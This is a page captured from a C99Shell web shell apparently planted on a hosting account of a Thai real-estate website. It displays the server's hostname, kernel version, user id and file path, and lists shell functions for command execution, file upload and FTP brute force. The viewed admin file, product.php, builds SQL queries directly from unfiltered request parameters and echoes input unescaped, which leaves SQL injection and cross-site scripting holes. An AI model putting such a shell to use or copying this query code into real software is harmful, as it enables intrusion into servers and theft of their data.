!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/5.6.40 

uname -a: Linux cpanel06wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.80.el6.x86_64 #1 SMP Thu Sep 24
01:42:00 EDT 2020 x86_64
 

uid=851(cp949260) gid=853(cp949260) groups=853(cp949260) 

Safe-mode: OFF (not secure)

/home/cp949260/public_html/krupimhomecenter.com/office/   drwxr-xr-x
Free 237.83 GB of 981.82 GB (24.22%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     product.php (16.78 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<? 
include 'index_IncludeAdmin.php'
$_SESSION['page'] = 'product.php';

$Q 1;
$Row "SELECT * FROM product WHERE ";

if (isset(
$_GET[catalog_id])&&$_GET[catalog_id]!='') {
    
$catalog_id   $_GET[catalog_id];
    if (
$Q==1) {
        
$Row .= " catalog_id = '$catalog_id' ";
        
$Q++;
    }
}
if (isset(
$_GET[market_id])&&$_GET[market_id]!='') {
    if (
$Q==1) {
        
$Row .= " ( market_id = '$_GET[market_id]')";
        
$Q++;
    }
    else{
        
$Row .= " AND  ( market_id = '$_GET[market_id]') ";
        
$Q++;
    }
}
if (isset(
$_GET[product_web_id])&&$_GET[product_web_id]!='') {
    if (
$Q==1) {
        
$Row .= " ( product_web_id = '$_GET[product_web_id]')";
        
$Q++;
    }
    else{
        
$Row .= " AND  ( product_web_id = '$_GET[product_web_id]') ";
        
$Q++;
    }
}
if (isset(
$_GET[floor_id])&&$_GET[floor_id]!='') {
    if (
$Q==1) {
        
$Row .= " ( floor_id = '$_GET[floor_id]')";
        
$Q++;
    }
    else{
        
$Row .= " AND  ( floor_id = '$_GET[floor_id]') ";
        
$Q++;
    }
}
if (isset(
$_GET[zone_id])&&$_GET[zone_id]!='') {
    if (
$Q==1) {
        
$Row .= " ( zone_id = '$_GET[zone_id]')";
        
$Q++;
    }
    else{
        
$Row .= " AND  ( zone_id = '$_GET[zone_id]') ";
        
$Q++;
    }
}
if (isset(
$_GET[neighborhood_name])&&$_GET[neighborhood_name]!='') {
    if (
$Q==1) {
        
$Row .= " ( neighborhood_name LIKE '%$_GET[neighborhood_name]%')";
        
$Q++;
    }
    else{
        
$Row .= " AND  ( neighborhood_name LIKE '%$_GET[neighborhood_name]%')  ";
        
$Q++;
    }
}
if (isset(
$_GET[trainstation_id])&&$_GET[trainstation_id]!='') {
    if (
$Q==1) {
        
$Row .= " ( trainstation_id = '$_GET[trainstation_id]')";
        
$Q++;
    }
    else{
        
$Row .= " AND  ( trainstation_id = '$_GET[trainstation_id]') ";
        
$Q++;
    }
}
if (isset(
$_GET[province_id])&&$_GET[province_id]!='') {
    if (
$Q==1) {
        
$Row .= " ( province_id = '$_GET[province_id]')";
        
$Q++;
    }
    else{
        
$Row .= " AND  ( province_id = '$_GET[province_id]') ";
        
$Q++;
    }
}
if (isset(
$_GET[keyword])&&$_GET[keyword]!='') {
    
$keyword $_GET['keyword'];
    
$keywordstr_replace("'","&#39;",$keyword);
    
$keywordstr_replace("\"","&quot;",$keyword);
    if (
$Q==1) {
        
$Row .= " ( product_search LIKE '%$keyword%'  )";
        
$Q++;
    }
    else{
        
$Row .= " AND  ( product_search LIKE '%$keyword%'  ) ";
        
$Q++;
    }
}
if (isset(
$_GET[product_zone])&&$_GET[product_zone]!='') {
    
$product_zone $_GET['product_zone'];
    
$product_zonestr_replace("'","&#39;",$product_zone);
    
$product_zonestr_replace("\"","&quot;",$product_zone);
    if (
$Q==1) {
        
$Row .= " ( product_zone LIKE '%$product_zone%'  )";
        
$Q++;
    }
    else{
        
$Row .= " AND  ( product_zone LIKE '%$product_zone%'  ) ";
        
$Q++;
    }
}
if (isset(
$_GET[plot_name])&&$_GET[plot_name]!='') {
    
$plot_name $_GET['plot_name'];
    if (
$Q==1) {
        
$Row .= " ( plot_name LIKE '%$plot_name%'  )";
        
$Q++;
    }
    else{
        
$Row .= " AND  ( plot_name LIKE '%$plot_name%'  ) ";
        
$Q++;
    }
}
if (isset(
$_GET[product_code])&&$_GET[product_code]!='') {
    
$product_code $_GET['product_code'];
    
$product_codestr_replace("'","&#39;",$product_code);
    
$product_codestr_replace("\"","&quot;",$product_code);
    if (
$Q==1) {
        
$Row .= " ( product_code = '$product_code'  )";
        
$Q++;
    }
    else{
        
$Row .= " AND  ( product_code = '$product_code'  ) ";
        
$Q++;
    }
}

if (
$Q==1) {
    
$Row "SELECT * FROM product ";
}
else{
    
$Row .= " ";
    
$Q++;
}
$RowQuery mysqli_query($con,$Row);
$Num_Rows mysqli_num_rows($RowQuery);

$Per_page 200;   // Per page
$page $_GET["page"];
if(!
$_GET["page"]){
    
$page=1;
}

$Prev_page $page-1;
$Next_page $page+1;
$page_Start = (($Per_page*$page)-$Per_page);
if(
$Num_Rows<=$Per_page){
    
$Num_pages =1;
}
else if((
$Num_Rows $Per_page)==0){
    
$Num_pages =($Num_Rows/$Per_page) ;
}
else{
    
$Num_pages =($Num_Rows/$Per_page)+1;
    
$Num_pages = (int)$Num_pages;
}

$i=$page_Start+1;

$product_SL $Row "  ORDER BY product_datetime IS NULL desc, product_sort asc  LIMIT $page_Start , $Per_page ";
$product_QR mysqli_query($con,$product_SL);

?>

<!DOCTYPE html>
<html>
<head>
    <? include 'index_Head.php'?>
</head>
<body>
    <? include 'index_Navbar.php'?>    
    <div class="container-fluid">
        <div class="row">
            <div class="col-md-2" id="main-left">
                <div class="row">
                    <div class="col-md-12">
                        <? include 'index_AdminMenu.php'?>
                    </div>
                </div>
            </div>
            <div class="col-md-10">
                <div class="row">
                    <div class="col-md-12">
                        <h3>  จัดการ อสังหาริมทรัพย์  </h3>
                        <hr>
                    </div>
                </div>
                <? include 'index_Alerts.php'?>
                <div class="row">
                    <div class="col-md-12">
                        <form class="form-inline" method="get">
                            <div class="form-group">
                                <a href="product_add.php" class="btn btn-success">
                                    <span class="glyphicon glyphicon-plus-sign"></span>
                                    เพิ่มอสังหาริมทรัพย์
                                </a>
                            </div>
                            <div class="form-group">
                                <select class="form-control"  name="product_web_id" >
                                    <option value="">(สมาชิก , คนนอก)</option>
                                    <?
                                    $product_web_SL 
" SELECT * FROM product_web ORDER BY product_web_id ASC";
                                    
$product_web_QR     mysqli_query($con,$product_web_SL);
                                    while (
$product_web     mysqli_fetch_array($product_web_QR)) {
                                        
?>
                                        <option value="<?php echo $product_web[product_web_id]; ?>"><?php echo $product_web[product_web_name]; ?>  </option>
                                        <?
                                    
}
                                    
?>
                                </select>
                                <select class="form-control"  name="market_id" >
                                    <option value="">ขาย & เช่า</option>
                                    <?
                                    $market_SL 
" SELECT * FROM market ORDER BY market_id ASC";
                                    
$market_QR     mysqli_query($con,$market_SL);
                                    while (
$market     mysqli_fetch_array($market_QR)) {
                                        
?>
                                        <option value="<?php echo $market[market_id]; ?>"><?php echo $market[market_name]; ?>  </option>
                                        <?
                                    
}
                                    
?>
                                </select>
                                <select class="form-control"  name="catalog_id" >
                                    <option value="">ประเภทอสังหาฯ</option>
                                    <?
                                    $catalog_SL 
" SELECT * FROM catalog  ORDER BY catalog_id ASC";
                                    
$catalog_QR     mysqli_query($con,$catalog_SL);
                                    while (
$catalog     mysqli_fetch_array($catalog_QR)) {
                                        
?>
                                        <option value="<?php echo $catalog[catalog_id]; ?>"><?php echo $catalog[catalog_name]; ?>  </option>
                                        <?
                                    
}
                                    
?>
                                </select>
                                <select class="form-control"  name="floor_id" >
                                    <option value="">ชั้น</option>
                                    <?
                                    $floor_SL 
" SELECT * FROM floor  ORDER BY floor_id ASC";
                                    
$floor_QR     mysqli_query($con,$floor_SL);
                                    while (
$floor     mysqli_fetch_array($floor_QR)) {
                                        
?>
                                        <option value="<?php echo $floor[floor_id]; ?>"><?php echo $floor[floor_name]; ?>  </option>
                                        <?
                                    
}
                                    
?>
                                </select>
                                <input type="text"  class="form-control" placeholder="โซนหรือถนน" name="neighborhood_name">
                                <select class="form-control"  name="province_id" onChange ="Listamphure(this.value)">
                                    <option value="">จังหวัด</option>
                                    <?
                                    $province_SL 
" SELECT * FROM province  ORDER BY province_id ASC";
                                    
$province_QR     mysqli_query($con,$province_SL);
                                    while (
$province     mysqli_fetch_array($province_QR)) {
                                        
?>
                                        <option value="<?php echo $province[province_id]; ?>"><?php echo $province[province_name]; ?>  </option>
                                        <?
                                    
}
                                    
?>
                                </select>
                                <input type="text"  class="form-control" placeholder="ค้นหาอสังหาริมทรัพย์" name="keyword">
                                <input type="text"  class="form-control" placeholder="รหัสทรัพย์" name="product_code">
                                <button type="submit" class="btn btn-primary">
                                    <span class="glyphicon glyphicon-search"></span>
                                    ค้นหา
                                </button>
                            </div>
                        </form>
                    </div>
                </div>
                <div class="row">
                    <div class="col-md-12 top-margin2">
                        <div class="panel panel-default">
                            <div class="panel-heading">
                                <div class="row">
                                    <div class="col-md-6">
                                        <?
                                        
if (isset($_GET[market_id])&&trim($_GET[market_id])!='') {
                                            
$markettopic_SL " SELECT * FROM market WHERE market_id = '$_GET[market_id]'";
                                            
$markettopic_QR mysqli_query($con,$markettopic_SL);
                                            
$markettopic     mysqli_fetch_array($markettopic_QR);
                                            
?>
                                            <? echo $markettopic[market_name]; echo " "?>
                                            <?
                                        
}
                                        if (isset(
$_GET[province_id])&&trim($_GET[province_id])!='') {
                                            
$provincetopic_SL " SELECT * FROM province WHERE province_id = '$_GET[province_id]'";
                                            
$provincetopic_QR mysqli_query($con,$provincetopic_SL);
                                            
$provincetopic     mysqli_fetch_array($provincetopic_QR);
                                            
?>
                                            <? echo $provincetopic[province_name]; echo " "?>
                                            <?
                                        
}
                                        if (isset(
$_GET[product_web_id])&&trim($_GET[product_web_id])!='') {
                                            
$product_webtopic_SL " SELECT * FROM product_web WHERE product_web_id = '$_GET[product_web_id]'";
                                            
$product_webtopic_QR mysqli_query($con,$product_webtopic_SL);
                                            
$product_webtopic     mysqli_fetch_array($product_webtopic_QR);
                                            
?>
                                            <? echo $product_webtopic[product_web_name]; echo " "?>
                                            <?
                                        
}
                                        if (isset(
$_GET[catalog_id])&&trim($_GET[catalog_id])!='') {
                                            
$catalogtopic_SL " SELECT * FROM catalog WHERE catalog_id = '$_GET[catalog_id]'";
                                            
$catalogtopic_QR mysqli_query($con,$catalogtopic_SL);
                                            
$catalogtopic     mysqli_fetch_array($catalogtopic_QR);
                                            
?>
                                            <? echo $catalogtopic[catalog_name]; echo " "?>
                                            <?
                                        
}
                                        if (isset(
$_GET[floor_id])&&trim($_GET[floor_id])!='') {
                                            
$floortopic_SL " SELECT * FROM floor WHERE floor_id = '$_GET[floor_id]'";
                                            
$floortopic_QR mysqli_query($con,$floortopic_SL);
                                            
$floortopic     mysqli_fetch_array($floortopic_QR);
                                            
?>
                                            <? echo $floortopic[floor_name]; echo " "?>
                                            <?
                                        
}
                                        if (isset(
$_GET[keyword])&&$_GET[keyword]!='') {
                                            
?>
                                            ค้นหา : <? echo $keyword; echo " "?>
                                            <?
                                        
}
                                        if (isset(
$_GET[plot_name])&&$_GET[plot_name]!='') {
                                            
?>
                                            รายการแสดง : <? echo $plot_name; echo " "?>
                                            <?
                                        
}
                                        if (isset(
$_GET[neighborhood_name])&&$_GET[neighborhood_name]!='') {
                                            
?>
                                            โซนหรือถนน : <? echo $_GET[neighborhood_name]; echo " "?>
                                            <?
                                        
}
                                        if (isset(
$_GET[product_code])&&$_GET[product_code]!='') {
                                            
?>
                                            รหัสทรัพย์ : <? echo $product_code; echo " "?>
                                            <?
                                        
}
                                        if (
$Q==1) {
                                            
?>
                                            อสังหาริมทรัพย์ทั้งหมด
                                            <?
                                        
}
                                        
?>
                                        <?
                                        
if ($Num_Rows=='0') { echo " (ไม่พบข้อมูล)"; }
                                        else{ 
                                            
?>
                                            <span class="badge"> <? echo "$Num_Rows"?></span> 
                                            <?
                                        

                                        
?>

                                    </div>
                                    <div class="col-md-6 text-right" style="margin: -5px;">
                                        <a class="btn btn-default" href="product_catalog_sort.php">
                                            ลำดับในประเภท
                                        </a>
                                        <a class="btn btn-default" onclick="location.reload()">
                                            รีเฟรชหน้า
                                        </a>
                                        <a class="btn btn-default" onclick="goBack()">
                                            <span class="glyphicon glyphicon-backward"></span>
                                            กลับ
                                        </a>
                                        <?
                                        
if ($Q!=1) {
                                            
?>
                                            <a class="btn btn-default" href="product.php">
                                                อสังหาริมทรัพย์ทั้งหมด
                                            </a>
                                            <?
                                        
}
                                        
?>
                                    </div>
                                </div>
                            </div>
                            <div class="panel-body">
                                <div class="table-responsive">
                                    <table class="table table-striped">
                                        <thead>
                                            <tr>
                                                <th>#</th>
                                                <th> รูป </th>
                                                <th> อสังหาริมทรัพย์ </th>
                                                <th> ประเภท </th>
                                                <th> รหัสทรัพย์ </th>
                                                <th> ราคา </th>
                                                <th> </th>
                                            </tr>
                                        </thead>
                                        <tbody class="row_position">
                                            <?
                                            
while ($product     mysqli_fetch_array($product_QR)) {

                                                
$plot_namestr_replace("HOT","บ้านฝากขาย",$product[plot_name]);
                                                
$plot_reset_update "UPDATE `product` SET `plot_name` = '$plot_name' WHERE  `product_id` = '$product[product_id]'";
                                                
$plot_reset_reult mysqli_query($con,$plot_reset_update);
                                                

                                                
?>
                                                <tr id="<?php echo $product['product_id'?>">
                                                    <td>
                                                        <p><?php echo $i?></p>
                                                    </td>
                                                    <td>
                                                        <a href="product_one.php?product_id=<?php echo $product[product_id]; ?>" >
                                                            <img style="width: 50px;height: 50px;" src="../Files/product_photo/<?php echo photo_min($product[product_photo]); ?>" />
                                                        </a>
                                                    </td>
                                                    <td style="width: 300px;">
                                                        <p><?php echo $product[product_name]; ?></p>
                                                    </td>
                                                    <td>
                                                        <p>
                                                            <?php 
                                                            $catalog_SL 
" SELECT * FROM catalog WHERE catalog_id = '$product[catalog_id]'";
                                                            
$catalog_QR mysqli_query($con,$catalog_SL);
                                                            
$catalog     mysqli_fetch_array($catalog_QR);
                                                            
?>
                                                            <? echo trim($catalog[catalog_name]); ?>
                                                        </p>
                                                        <p>
                                                            <? echo trim($product[plot_name]); ?>
                                                        </p>
                                                    </td>
                                                    <td>
                                                        <? 
                                                        
if (isset($product[product_code])&&trim($product[product_code])!='') {
                                                            echo 
$product[product_code]; 
                                                        }
                                                        else{
                                                            echo 
"-";
                                                        }
                                                        
?>
                                                    </td>
                                                    <td>
                                                        <p>
                                                            <?php 
                                                            $market_SL 
" SELECT * FROM market WHERE market_id = '$product[market_id]'";
                                                            
$market_QR mysqli_query($con,$market_SL);
                                                            
$market     mysqli_fetch_array($market_QR);
                                                            
?>
                                                            (<? echo $market[market_word]; ?>
                                                            <?
                                                            
if (isset($product[product_price])&&trim($product[product_price]!=0)&&trim($product[product_price]!='')) {
                                                                echo 
number_format($product[product_price]); 
                                                            }
                                                            else{
                                                                echo 
"-";
                                                            }
                                                            
?>
                                                            <?
                                                            
if (isset($product[product_rebate])&&trim($product[product_rebate]!=0)&&trim($product[product_rebate]!='')) {
                                                                
?>
                                                                <span style="text-decoration:line-through">
                                                                    <? echo number_format($product[product_rebate]);  ?>
                                                                </span>
                                                                <?
                                                            
}
                                                            
?>
                                                        </p>
                                                    </td>
                                                    <td style="width: 300px;">
                                                        <a href="product_one.php?product_id=<?php echo $product[product_id]; ?>" class="btn btn-primary">
                                                            <span class="glyphicon glyphicon-zoom-in"></span>
                                                            รายละเอียด 
                                                        </a>
                                                        <a href="product_update.php?product_id=<?php echo $product[product_id]; ?>" class="btn btn-info">
                                                            <span class="glyphicon glyphicon-edit"></span>
                                                            แก้ไข
                                                        </a>
                                                        <a href="product_del.php?product_id=<?php echo $product[product_id]; ?>" onclick="return confirm(' ยืนยันการลบข้อมูล ? ')" class="btn btn-danger">
                                                            <span class="glyphicon glyphicon-trash"></span> ลบ
                                                        </a>
                                                    </td>
                                                </tr>
                                                <?php
                                                $i
++;
                                            }
                                            
?>
                                        </tbody>
                                    </table>
                                </div>
                            </div>
                            <div class="panel-footer">
                                <? include 'index_pagenum.php'?>
                            </div>
                        </div>
                    </div>
                    <!-- 12 -->
                </div>
                <!-- row -->
            </div>
            <!-- 10 -->
        </div>
        <!-- row -->
    </div>
    <!-- container -->
    <?
    $position 
$_POST['position'];
    
$product_sort_i=1;
    foreach(
$position as $k=>$v){
        
$sql "Update product SET product_sort=".$product_sort_i." WHERE product_id =".$v;
        
$mysqli->query($sql);
        
$product_sort_i++;
    }
    
?>
    <script type="text/javascript">
        $( ".row_position" ).sortable({
            delay: 150,
            stop: function() {
                var selectedData = new Array();
                $('.row_position>tr').each(function() {
                    selectedData.push($(this).attr("id"));
                });
                updateOrder(selectedData);
            }
        });
        function updateOrder(data) {
            $.ajax({
                url:"product.php",
                type:'post',
                data:{position:data},
                success:function(){
                }
            })
        }
    </script>
</body>
</html>



:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.1678 ]--